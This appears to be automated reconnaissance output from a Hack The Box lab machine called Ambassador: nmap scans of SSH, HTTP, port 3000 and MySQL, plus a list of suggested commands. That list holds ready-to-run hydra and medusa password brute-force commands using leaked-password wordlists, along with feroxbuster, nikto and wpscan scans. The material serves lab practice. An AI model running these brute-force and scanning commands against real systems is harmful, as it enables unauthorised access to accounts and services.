|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:34 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:39 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 66
| Capabilities flags: 65535
| Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, Support41Auth, SupportsCompression, ConnectWithDatabase, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, LongPassword, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: CQA;\x02((\x1DG(\x0E&BtT@27\x0B%
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDC5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23
SF::34\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2024\x20Jan\x202023\x2012:23:39\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(Hello,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLv23SessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:28:24 2023 -- 1 IP address (1 host up) scanned in 335.34 seconds

38
HTB/ambassador/results/10.10.11.183/scans/_manual_commands.txt Normal file
View File

@@ -0,0 +1,38 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.183
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.183
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.10.11.183:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.183/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.183 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.183/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.183 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.10.11.183:80 2>&1 | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.10.11.183:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_wpscan.txt"
[*] mysql on tcp/3306
[-] (sqsh) interactive database shell:
sqsh -U <username> -P <password> -S 10.10.11.183:3306

2
HTB/ambassador/results/10.10.11.183/scans/_patterns.log Normal file
View File

@@ -0,0 +1,2 @@
Identified HTTP Server: Apache/2.4.41 (Ubuntu)

101
HTB/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,101 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.047s latency).
Scanned at 2023-01-24 07:22:49 EST for 294s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:22:57 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:02 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 43
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, LongPassword, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, InteractiveClient, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x01g1\x0D<8\x19#\x08@u6\x18S\x06VdJ\x0D[
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDA0%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:22
SF::57\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2024\x20Jan\x202023\x2012:23:02\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(Hello,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLv23SessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:27:43 2023 -- 1 IP address (1 host up) scanned in 294.24 seconds

62
HTB/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt Normal file
View File

@@ -0,0 +1,62 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.058s latency).
Scanned at 2023-01-24 07:27:44 EST for 1s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
|_banner: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
| ssh2-enum-algos:
| kex_algorithms: (9)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (5)
| rsa-sha2-512
| rsa-sha2-256
| ssh-rsa
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:27:45 2023 -- 1 IP address (1 host up) scanned in 1.87 seconds

100
HTB/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml Normal file
View File

@@ -0,0 +1,100 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.183 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.183" start="1674563263" startstr="Tue Jan 24 07:27:43 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="connect" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="Connect Scan" time="1674563264"/>
<taskend task="Connect Scan" time="1674563264" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674563264"/>
<taskend task="Service scan" time="1674563264" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674563264"/>
<taskend task="NSE" time="1674563265"/>
<taskbegin task="NSE" time="1674563265"/>
<taskend task="NSE" time="1674563265"/>
<host starttime="1674563264" endtime="1674563265"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.183" addrtype="ipv4"/>
<hostnames>
<hostname name="ambassador.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="banner" output="SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5"/><script id="ssh-hostkey" output="&#xa; 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=&#xa; 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=&#xa; 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W"><table>
<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=</elem>
<elem key="fingerprint">29dd8ed7171e8e3090873cc651007c75</elem>
<elem key="bits">3072</elem>
<elem key="type">ssh-rsa</elem>
</table>
<table>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=</elem>
<elem key="fingerprint">80a4c52e9ab1ecda276439a408973bef</elem>
<elem key="bits">256</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
</table>
<table>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W</elem>
<elem key="fingerprint">f590ba7ded55cb7007f2bbc891931bf6</elem>
<elem key="bits">256</elem>
<elem key="type">ssh-ed25519</elem>
</table>
</script><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (9)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (5)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ssh-rsa&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ssh-rsa</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
